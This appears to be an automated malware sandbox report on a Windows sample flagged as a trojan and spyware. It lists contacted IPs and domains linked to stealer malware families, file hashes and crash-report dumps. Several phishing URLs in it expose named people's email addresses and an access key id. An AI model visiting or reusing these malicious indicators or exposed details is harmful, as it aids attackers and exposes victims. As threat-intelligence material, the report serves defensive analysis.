                                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@13/4
                                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                                    • Number of non-executed functions: 2
                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.63, 4.245.163.56, 20.190.177.23, 4.175.87.197
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                    • Execution Graph export aborted for target TmmiCE5Ulm.exe, PID 5600 because there are no executed function
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                    01:26:18API Interceptor43x Sleep call for process: TmmiCE5Ulm.exe modified
                                                                                                                                                                                                                                                    01:27:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                    • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                                    23.55.153.1069pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                          ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • jasonj002.bitbucket.io/
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        lev-tolstoi.com9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        s3-w.us-east-1.amazonaws.comuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 16.182.37.145
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.216.41.233
                                                                                                                                                                                                                                                                        https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.217.128.241
                                                                                                                                                                                                                                                                        https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.216.142.68
                                                                                                                                                                                                                                                                        https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.231.135.57
                                                                                                                                                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 54.231.224.185
                                                                                                                                                                                                                                                                        D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 52.217.32.148
                                                                                                                                                                                                                                                                        https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                        • 3.5.25.98
                                                                                                                                                                                                                                                                        http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 3.5.27.174
                                                                                                                                                                                                                                                                        fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 3.5.31.118
                                                                                                                                                                                                                                                                        bitbucket.orguLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                                                                                                        BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                                                                                                        4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        steamcommunity.com9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EU9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.44.201.28
                                                                                                                                                                                                                                                                        AMAZON-02USuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 108.139.47.92
                                                                                                                                                                                                                                                                        https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 65.9.112.70
                                                                                                                                                                                                                                                                        https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 108.158.71.175
                                                                                                                                                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 64.252.106.176
                                                                                                                                                                                                                                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 54.122.130.248
                                                                                                                                                                                                                                                                        loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 54.96.126.18
                                                                                                                                                                                                                                                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 13.247.83.253
                                                                                                                                                                                                                                                                        CLOUDFLARENETUS9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e19pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):1.042830435951983
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:uYF14L5AndXWsAohroI7JfdQXIDcQvc6QcEVcw3cE/ri++HbHg/8BRTf3Oy1oVaz:L65SW70BU/AjudxqfzuiFRZ24IO8r
                                                                                                                                                                                                                                                                        MD5:5ADC90170AED2666954808803363A434
                                                                                                                                                                                                                                                                        SHA1:C3B5EBA59238CE242B56E3A2B2D21444E4F27811
                                                                                                                                                                                                                                                                        SHA-256:1ACEAE1C8BA7FA623ACF85464ECD2A7DCEC801C4ABFD0B2F1A6496D1AE09F4B9
                                                                                                                                                                                                                                                                        SHA-512:E69CEE9F46C046245F12D06A1BF855202221B3BBAA8D4FE9D83D82A691E598E8CB9F783C72DDA609F89DC0C18F2B891DA731423BB45D6590A75D0252F86F4000
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.0.8.8.1.3.0.4.7.3.8.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.0.8.8.1.3.6.5.6.7.2.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.c.9.a.8.4.9.-.b.a.9.f.-.4.9.b.2.-.a.7.b.c.-.4.2.6.5.1.b.b.1.c.a.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.1.4.8.3.9.a.-.0.2.d.9.-.4.7.1.9.-.b.6.4.9.-.c.9.d.1.e.9.c.3.8.3.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.m.m.i.C.E.5.U.l.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.0.-.0.0.0.1.-.0.0.1.4.-.2.0.3.8.-.b.6.9.2.0.3.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.b.1.a.6.3.2.a.9.2.0.3.2.8.b.3.7.7.b.d.d.9.c.6.7.a.d.d.3.3.a.0.0.0.0.f.f.f.f.!.0.0.0.0.c.2.3.e.0.0.4.b.a.c.a.2.9.1.6.e.9.8.6.c.5.5.6.9.7.4.a.b.a.a.b.7.7.8.3.b.d.b.a.7.!.T.m.m.i.C.E.5.U.l.m...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 06:26:53 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):286854
                                                                                                                                                                                                                                                                        Entropy (8bit):1.5103489242054462
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:qK3/BB+5BWSlaYstpIvc++w6fUtuJCU78223rJzf:PozipIvV+w6fUtuoU82iJzf
                                                                                                                                                                                                                                                                        MD5:2C6ED82DA7A69B7B620BBBFC57EA6003
                                                                                                                                                                                                                                                                        SHA1:DB624E576C2DDCE7DD12E919B1CA6D2B65D6F434
                                                                                                                                                                                                                                                                        SHA-256:140C9DD55FB0D721B0BFAA760EEEEF5B028768E14F08B61A049C3DC4586C5DD3
                                                                                                                                                                                                                                                                        SHA-512:938F5C2BA5F018FD1E78592E0CD060B29674AAC1373502F70482E457A83093AD9B358FBC198D1F06EBED8990966801333A9E2F22E02D4452D02A906A286E9246
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .........ig.........................................'......4..............`.......8...........T............L..............T)..........@+..............................................................................eJ.......+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8384
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7040991616955927
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ4y6hY6YEIcSU9RsgmfZvprO89b4SsfDom:R6lXJ16e6YEjSU9RsgmfZV4RfZ
                                                                                                                                                                                                                                                                        MD5:62285E805E5D92B0175B6B3F13FBB1CD
                                                                                                                                                                                                                                                                        SHA1:65ECA24EAF557FDB7A187B88FC8AB2E199D87D9C
                                                                                                                                                                                                                                                                        SHA-256:26DC8D7D1DD96D08A64216B9334CA0E03FDBFECA7B438C497B411F4CC550E188
                                                                                                                                                                                                                                                                        SHA-512:B97A90623A6C90304B1CB9CFFC5DD6BDB0E7A3E59DD18063380038AFAB73F615421312F6B1FAD64304C71855B4334AF621ED53F6B3CF9ED9E0E0E9E038D2C195
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.0.<./.P.i.
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.495999231849218
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnVJg77aI9UHWpW8VYQYm8M4JBKgFv+q8Q6z7Pzz1d:uIjfnvI7C27VsJfW7Pzz1d
                                                                                                                                                                                                                                                                        MD5:5736FD727A921621F428EFCB0585CF38
                                                                                                                                                                                                                                                                        SHA1:19146FC302EA4E496ED1A49770D7514D3E19740F
                                                                                                                                                                                                                                                                        SHA-256:E94B03C01E023CFB23E9367F860FC9AE9087E8045A17B6CF613EC3028FF6A496
                                                                                                                                                                                                                                                                        SHA-512:249403464BBD071A9814922D12A6D660E80977B862353E0F0EC5FA1C6B0ECF01295BC0080F1EC4F9DA445E89001B99444F2C72A358AD641C2AD28F0964A95FE4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
